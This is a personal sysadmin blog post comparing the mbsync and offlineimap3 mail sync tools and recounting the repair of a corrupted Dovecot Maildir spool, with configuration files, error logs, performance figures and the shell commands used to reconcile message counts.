During the migration, notmuch helpfully told me the full list of those lost messages:
[...]
Warning: cannot apply tags to missing message: CAN6gO7_QgCaiDFvpG3AXHi6fW12qaN286+2a7ERQ2CQtzjSEPw@mail.gmail.com
Warning: cannot apply tags to missing message: CAPTU9Wmp0yAmaxO+qo8CegzRQZhCP853TWQ_Ne-YF94MDUZ+Dw@mail.gmail.com
Warning: cannot apply tags to missing message: F5086003-2917-4659-B7D2-66C62FCD4128@gmail.com
[...]
Warning: cannot apply tags to missing message: mailman.2.1316793601.53477.sage-members@mailman.sage.org
Warning: cannot apply tags to missing message: mailman.7.1317646801.26891.outages-discussion@outages.org
Warning: cannot apply tags to missing message: notmuch-sha1-000458df6e48d4857187a000d643ac971deeef47
Warning: cannot apply tags to missing message: notmuch-sha1-0079d8e0c3340e6f88c66f4c49fca758ea71d06d
Warning: cannot apply tags to missing message: notmuch-sha1-0194baa4cfb6d39bc9e4d8c049adaccaa777467d
Warning: cannot apply tags to missing message: notmuch-sha1-02aede494fc3f9e9f060cfd7c044d6d724ad287c
Warning: cannot apply tags to missing message: notmuch-sha1-06606c625d3b3445420e737afd9a245ae66e5562
Warning: cannot apply tags to missing message: notmuch-sha1-0747b020f7551415b9bf5059c58e0a637ba53b13
[...]
As detailed in the crash report, all of those were actually innocuous and could be ignored. Also note that we completely trash the notmuch database because it's actually faster to reindex from scratch than let notmuch slowly figure out that all mails are new and all the old mails are gone. The fresh indexing took:
nov 19 15:08:54 angela notmuch[2521117]: Processed 384679 total files in 23m 41s (270 files/sec.).
nov 19 15:08:54 angela notmuch[2521117]: Added 372610 new messages to the database.
While a reindexing on top of an existing database was going twice as slow, at about 120 files/sec.

Current config file Putting it all together, I ended up with the following configuration file:
SyncState *
Sync All
# IMAP side, AKA "Far"
IMAPAccount anarcat-imap
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPAccount anarcat-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"
IMAPStore anarcat-remote
Account anarcat-tunnel
# Maildir side, AKA "Near"
MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir/
# what binds Maildir and IMAP
Channel anarcat
Far :anarcat-remote:
Near :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
#Patterns *
Patterns * !register  !.register
# Automatically create missing mailboxes, both locally and on the server
Create Both
#Create Near
# Sync the movement of messages between folders and deletions, add after making sure the sync works
Expunge Both
# Propagate mailbox deletion
Remove both
IMAPAccount anarcat-register-imap
Host imap.anarc.at
User register
PassCmd "pass imap.anarc.at-register"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt
IMAPAccount anarcat-register-tunnel
Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C register@imap.anarc.at /usr/lib/dovecot/imap"
IMAPStore anarcat-register-remote
Account anarcat-register-tunnel
MaildirStore anarcat-register-local
SubFolders Maildir++
Inbox ~/Maildir/.register/
Channel anarcat-register
Far :anarcat-register-remote:
Near :anarcat-register-local:
Create Both
Expunge Both
Remove both
Note that it may be out of sync with my live (and private) configuration file, as I do not publish my "dotfiles" repository publicly for security reasons.

OfflineIMAP I've used OfflineIMAP for a long time before switching to SMD. I don't exactly remember why or when I started using it, but I do remember it became painfully slow as I started using notmuch, and would sometimes crash mysteriously. It's been a while, so my memory is hazy on that. It also kind of died in a fire when Python 2 stop being maintained. The main author moved on to a different project, imapfw which could serve as a framework to build IMAP clients, but never seemed to implement all of the OfflineIMAP features and certainly not configuration file compatibility. Thankfully, a new team of volunteers ported OfflineIMAP to Python 3 and we can now test that new version to see if it is an improvement over mbsync.

Crash on full sync The first thing that happened on a full sync is this crash:
Copy message from RemoteAnarcat:junk:
 ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Thread 'Copy message from RemoteAnarcat:junk' terminated with exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/imaputil.py", line 406, in utf7m_decode
    for c in binary.decode():
AttributeError: 'memoryview' object has no attribute 'decode'
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
  File "/usr/share/offlineimap3/offlineimap/threadutil.py", line 146, in run
    Thread.run(self)
  File "/usr/lib/python3.9/threading.py", line 892, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Last 1 debug messages logged for Copy message from RemoteAnarcat:junk prior to exception:
thread: Register new thread 'Copy message from RemoteAnarcat:junk' (account 'Anarcat')
ERROR: Exceptions occurred during the run!
ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
Folder junk [acc: Anarcat]:
 Copy message UID 30626 (29008/49310) RemoteAnarcat:junk -> LocalAnarcat:junk
Command exited with non-zero status 100
5252.91user 535.86system 3:21:00elapsed 47%CPU (0avgtext+0avgdata 846304maxresident)k
96344inputs+26563792outputs (1189major+2155815minor)pagefaults 0swaps
That only transferred about 8GB of mail, which gives us a transfer rate of 5.3Mbit/s, more than 5 times slower than mbsync. This bug is possibly limited to the bullseye version of offlineimap3 (the lovely 0.0~git20210225.1e7ef9e+dfsg-4), while the current sid version (the equally gorgeous 0.0~git20211018.e64c254+dfsg-1) seems unaffected.

Tolerable performance The new release still crashes, except it does so at the very end, which is an improvement, since the mails do get transferred:
 *** Finished account 'Anarcat' in 511:12
ERROR: Exceptions occurred during the run!
ERROR: Exception parsing message with ID (<20190619152034.BFB8810E07A@marcos.anarc.at>) from imaplib (response type: bytes).
 AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(
ERROR: Exception parsing message with ID (<40A270DB.9090609@alternatives.ca>) from imaplib (response type: bytes).
 AttributeError: decoding with 'x-mac-roman' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(
ERROR: IMAP server 'RemoteAnarcat' does not have a message with UID '32686'
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 889, in _fetch_from_imap
    raise OfflineImapError(reason, severity)
Command exited with non-zero status 1
8273.52user 983.80system 8:31:12elapsed 30%CPU (0avgtext+0avgdata 841936maxresident)k
56376inputs+43247608outputs (811major+4972914minor)pagefaults 0swaps
"offlineimap  -o " took 8 hours 31 mins 15 secs
This is 8h31m for transferring 12G, which is around 3.1Mbit/s. That is nine times slower than mbsync, almost an order of magnitude! Now that we have a full sync, we can test incremental synchronization. That is also much slower:
===> multitime results
1: sh -c "offlineimap -o   true"
            Mean        Std.Dev.    Min         Median      Max
real        24.639      0.513       23.946      24.526      25.708      
user        23.912      0.473       23.404      23.795      24.947      
sys         1.743       0.105       1.607       1.729       2.002
That is also an order of magnitude slower than mbsync, and significantly slower than what you'd expect from a sync process. ~30 seconds is long enough to make me impatient and distracted; 3 seconds, less so: I can wait and see the results almost immediately.

Integrity check That said: this is still on a gigabit link. It's technically possible that OfflineIMAP performs better than mbsync over a slow link, but I Haven't tested that theory. The OfflineIMAP mail spool is missing quite a few messages as well:
anarcat@angela:~(main)$ find Maildir-offlineimap -type f -type f -a \! -name '.*'   wc -l 
381463
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*'   wc -l 
385247
... although that's probably all either new messages or the register folder, so OfflineIMAP might actually be in a better position there. But digging in more, it seems like the actual per-folder diff is fairly similar to mbsync: a few messages missing here and there. Considering OfflineIMAP's instability and poor performance, I have not looked any deeper in those discrepancies.

Other projects to evaluate Those are all the options I have considered, in alphabetical order
  • doveadm-sync: requires dovecot on both ends, can tunnel over SSH, may have performance issues in incremental sync, written in C
  • fdm: fetchmail replacement, IMAP/POP3/stdin/Maildir/mbox,NNTP support, SOCKS support (for Tor), complex rules for delivering to specific mailboxes, adding headers, piping to commands, etc. discarded because no (real) support for keeping mail on the server, and written in C
  • getmail: fetchmail replacement, IMAP/POP3 support, supports incremental runs, classification rules, Python
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap, but requires running an IMAP server locally, Perl
  • isync/mbsync: TLS client certs and SSH tunnels, fast, incremental, IMAP/POP/Maildir support, multiple mailbox, trash and recursion support, and generally has good words from multiple Debian and notmuch people (Arch tutorial), written in C, review above
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, mentions rsmtp which is a nice name for rsendmail. not evaluated because it seems awfully complex to setup, Haskell
  • nncp: treat the local spool as another mail server, not really compatible with my "multiple clients" setup, Golang
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, review above, Python
Most projects were not evaluated due to lack of time.

Conclusion I'm now using mbsync to sync my mail. I'm a little disappointed by the synchronisation times over the slow link, but I guess that's on par for the course if we use IMAP. We are bound by the network speed much more than with custom protocols. I'm also worried about the C implementation and the crashes I have witnessed, but I am encouraged by the fast upstream response. Time will tell if I will stick with that setup. I'm certainly curious about the promises of interimap and mail-sync, but I have ran out of time on this project.

Antoine Beaupr : The last syncmaildir crash

My syncmaildir (SMD) setup failed me one too many times (previously, previously). In an attempt to migrate to an alternative mail synchronization tool, I looked into using my IMAP server again, and found out my mail spool was in a pretty bad shape. I'm comparing mbsync and offlineimap in the next post but this post talks about how I recovered the mail spool so that tools like those could correctly synchronise the mail spool again.

The latest crash On Monday, SMD just started failing with this error:
nov 15 16:12:19 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:12:22 angela systemd[2305]: smd-pull.service: Succeeded.
nov 15 16:12:22 angela systemd[2305]: Finished pull emails with syncmaildir.
nov 15 16:14:08 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:14:11 angela systemd[2305]: Failed to start pull emails with syncmaildir.
nov 15 16:16:14 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Unable to get any data from the other endpoint.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: This problem may be transient, please retry.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Hint: did you correctly setup the SERVERNAME variable
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: on your client? Did you add an entry for it in your ssh
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: configuration file?
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error
nov 15 16:16:17 angela smd-pull[27188]: register: smd-client@localhost: TAGS: error::context(handshake) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:16:17 angela systemd[2305]: Failed to start pull emails with syncmaildir.
What is frustrating is that there's actually no network error here. Running the command by hand I did see a different message, but now I have lost it in my backlog. It had something to do with a filename being too long, and I gave up debugging after a while. This happened suddenly too, which added to the confusion. In a fit of rage I started this blog post and experimenting with alternatives, which led me down a lot of rabbit holes. Reviewing my previous mail crash documentation, it seems most solutions involve talking to an IMAP server, so I figured I would just do that. Wanting to try something new, i gave isync (AKA mbsync) a try. Oh dear, I did not expect how much trouble just talking to my IMAP server would be, which wasn't not isync's fault, for what that's worth. It was the primary tool I used to debug things, and served me well in that regard.

Mailbox corruption The first thing I found out is that certain messages in the IMAP spool were corrupted. mbsync would stop on a FETCH command and Dovecot would give me those errors on the server side.

"wrong W value"
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Maildir filename has wrong W value, renamed the file from /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S to /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495:2,S
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Deleting corrupted cache record uid=1582: UID 1582: Broken virtual size in mailbox junk: read(/home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S): FETCH BODY[] got too little data: 2540 vs 2578
At least this first error was automatically healed by Dovecot (by renaming the file without the W= flag). The problem is that the FETCH command fails and mbsync exits noisily. So you need to constantly restart mbsync with a silly command like:
while ! mbsync -a; do sleep 1; done

"cached message size larger than expected"
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=mail stream)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: Deleting corrupted cache record uid=19288: UID 19288: Broken physical size in mailbox Sent: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=)
nov 16 13:53:08 marcos dovecot[3520770]: imap-login: Panic: epoll_ctl(del, 7) failed: Bad file descriptor
This second problem is much harder to fix, because dovecot does not recover automatically. This is Dovecot complaining that the cached size (the S= field, but also present in Dovecot's metadata files) doesn't match the file size. I wonder if at least some of those messages were corrupted in the OfflineIMAP to syncmaildir migration because part of that procedure is to run the strip_header script to remove content from the emails. That could easily have broken things since the files do not also get renamed.

Workaround So I read a lot of the Dovecot documentation on the maildir format, and wrote an extensive fix script for those two errors. The script worked and mbsync was able to sync the entire mail spool. And no, rebuilding the index files didn't work. Also tried doveadm force-resync -u anarcat which didn't do anything. In the end I also had to do this, because the wrong cache values were also stored elsewhere.
service dovecot stop ; find -name 'dovecot*' -delete; service dovecot start
This would have totally broken any existing clients, but thankfully I'm starting from scratch (except maybe webmail, but I'm hoping it will self-heal as well, assuming it only has a cache and not a full replica of the mail spool).

Incoherence between Maildir and IMAP Unfortunately, the first mbsync was incomplete as it was missing about 15,000 mails:
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*'   wc -l 
384836
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*'   wc -l 
369221
As it turns out, mbsync was not at fault here either: this was yet more mail spool corruption. It's actually 26 folders (out of 205) with inconsistent sizes, which can be found with:
for folder in * .[^.]* ; do 
  printf "%s\t%d\n" $folder $(find "$folder" -type f -a \! -name '.*'   wc -l );
done
The special \! -name '.*' bit is to ignore the mbsync metadata, which creates .uidvalidity and .mbsyncstate in every folder. That ignores about 200 files but since they are spread around all folders, which was making it impossible to review where the problem was. Here is what the diff looks like:
--- Maildir-list    2021-11-17 20:42:36.504246752 -0500
+++ Maildir-mbsync-list 2021-11-17 20:18:07.731806601 -0500
@@ -6,16 +6,15 @@
[...]
 .Archives  1
 .Archives.2010 3553
-.Archives.2011 3583
-.Archives.2012 12593
+.Archives.2011 3582
+.Archives.2012 620
 .Archives.2013 8576
 .Archives.2014 11057
-.Archives.2015 8173
+.Archives.2015 8165
 .Archives.2016 54
 .band  34
 .bitbuck   1
@@ -38,13 +37,12 @@
 .couchsurfers  2
-cur    11285
+cur    11280
 .current   130
 .cv    2
 .debbug    262
-.debian    37544
-drafts 1
-.Drafts    4
+.debian    37533
+.Drafts    2
 .drone 241
 .drupal    188
 .drupal-devel  303
[...]

Misfiled messages It's a bit all over the place, but we can already notice some huge differences between mailboxes, for example in the Archives folders. As it turns out, at least 12,000 of those missing mails were actually misfiled: instead of being in the Maildir/.Archives.2012/cur/ folder, they were directly in Maildir/.Archives.2012/. This is something that doesn't matter for SMD (and possibly for notmuch? it does matter, notmuch suddenly found 12,000 new mails) but that definitely matters to Dovecot and therefore mbsync... After moving those files around, we still have 4,000 message missing:
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*'   wc -l 
381196
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*'   wc -l 
385053
The problem is that those 4,000 missing mails are harder to track. Take, for example, .Archives.2011, which has a single message missing, out of 3,582. And the files are not identical: the checksums don't match after going through the IMAP transport, so we can't use a tool like hashdeep to compare the trees and find why any single file is missing.

"register" folder One big chunk of the 4,000, however, is a special folder called register in my spool, which I am syncing separately (see Securing registration email for details on that setup). That actually covers 3,700 of those messages, so I actually have a more modest 300 messages to figure out, after (easily!) configuring mbsync to sync that folder separately:
 @@ -30,9 +33,29 @@ Slave :anarcat-local:
  # Exclude everything under the internal [Gmail] folder, except the interesting folders
  #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
  # Or include everything
 -Patterns *
 +#Patterns *
 +Patterns * !register  !.register
  # Automatically create missing mailboxes, both locally and on the server
  #Create Both
  Create slave
  # Sync the movement of messages between folders and deletions, add after making sure the sync works
  #Expunge Both
 +
 +IMAPAccount anarcat-register
 +Host imap.anarc.at
 +User register
 +PassCmd "pass imap.anarc.at-register"
 +SSLType IMAPS
 +CertificateFile /etc/ssl/certs/ca-certificates.crt
 +
 +IMAPStore anarcat-register-remote
 +Account anarcat-register
 +
 +MaildirStore anarcat-register-local
 +SubFolders Maildir++
 +Inbox ~/Maildir-mbsync/.register/
 +
 +Channel anarcat-register
 +Master :anarcat-register-remote:
 +Slave :anarcat-register-local:
 +Create slave

"tmp" folders and empty messages After syncing the "register" messages, I end up with the measly little 160 emails out of sync:
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*'   wc -l 
384900
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*'   wc -l 
385059
Argh. After more digging, I have found 131 mails in the tmp/ directories of the client's mail spool. Mysterious! On the server side, it's even more files, and not the same ones. Possible that those were mails that were left there during a failed delivery of some sort, during a power failure or some sort of crash? Who knows. It could be another race condition in SMD if it runs while mail is being delivered in tmp/... The first thing to do with those is to cleanup a bunch of empty files (21 on angela):
find .[^.]*/tmp -type f -empty -delete
As it turns out, they are all duplicates, in the sense that notmuch can easily find a copy of files with the same message ID in its database. In other words, this hairy command returns nothing
find .[^.]*/tmp -type f   while read path; do
  msgid=$(grep -m 1  -i ^message-id "$path"   sed 's/Message-ID: //i;s/[<>]//g');
  if notmuch count --exclude=false  "id:$msgid"   grep -q 0; then
    echo "$path <$msgid> not in notmuch" ;
  fi;
done
... which is good. Or, to put it another way, this is safe:
find .[^.]*/tmp -type f -delete
Poof! 314 mails cleaned on the server side. Interestingly, SMD doesn't pick up on those changes at all and still sees files in tmp/ directories on the client side, so we need to operate the same twisted logic there.

notmuch to the rescue again After cleaning that on the client, we get:
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*'   wc -l 
384928
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*'   wc -l 
384901
Ha! 27 mails difference. Those are the really sticky, unclear ones. I was hoping a full sync might clear that up, but after deleting the entire directory and starting from scratch, I end up with:
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*'   wc -l 
385034
anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*'   wc -l 
384993
That is: even more messages missing (now 37). Sigh. Thankfully, this is something notmuch can help with: it can index all files by Message-ID (which I learned is case-insensitive, yay) and tell us which messages don't make it through. Considering the corruption I found in the mail spool, I wouldn't be the least surprised those messages are just skipped by the IMAP server. Unfortunately, there's nothing on the Dovecot server logs that would explain the discrepancy. Here again, notmuch comes to the rescue. We can list all message IDs to figure out that discrepancy:
notmuch search --exclude=false --output=messages '*'   pv -s 18M   sort > Maildir-msgids
notmuch --config=.notmuch-config-mbsync search --exclude=false --output=messages '*'   pv -s 18M   sort > Maildir-mbsync-msgids
And then we can see how many messages notmuch thinks are missing:
$ wc -l *msgids
372723 Maildir-mbsync-msgids
372752 Maildir-msgids
That's 29 messages. Oddly, it doesn't exactly match the find output:
anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*'   wc -l 
385204
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*'   wc -l 
385241
That is 10 more messages. Ugh. But actually, I know what those are: more misfiled messages (in a .folder/draft/ directory, bizarrely, so the totals actually match. In the notmuch output, there's a lot of stuff like this:
id:notmuch-sha1-fb880d673e24f5dae71b6b4d825d4a0d5d01cde4
Those are messages without a valid Message-ID. Notmuch (presumably) constructs one based on the file's checksum. Because the files differ between the IMAP server and the local mail spool (which is unfortunate, but possibly inevitable), those do not match. There are exactly the same number of those on both sides, so I'll go ahead and assume those are all accounted for. What remains is:
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids    grep '^\-[^-]'   grep -v sha1   wc -l 
2
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids    grep '^\+[^+]'   grep -v sha1   wc -l 
21
anarcat@angela:~(main)$ 
ie. 21 missing from mbsync, and, surprisingly, 2 missing from the original mail spool. Further inspection also showed they were all messages with some sort of "corruption": no body and only headers. I am not sure that is a legal email format in the first place. Since they were mostly spam or administrative emails ("You have been unsubscribed from mailing list..."), it seems fairly harmless to ignore those.

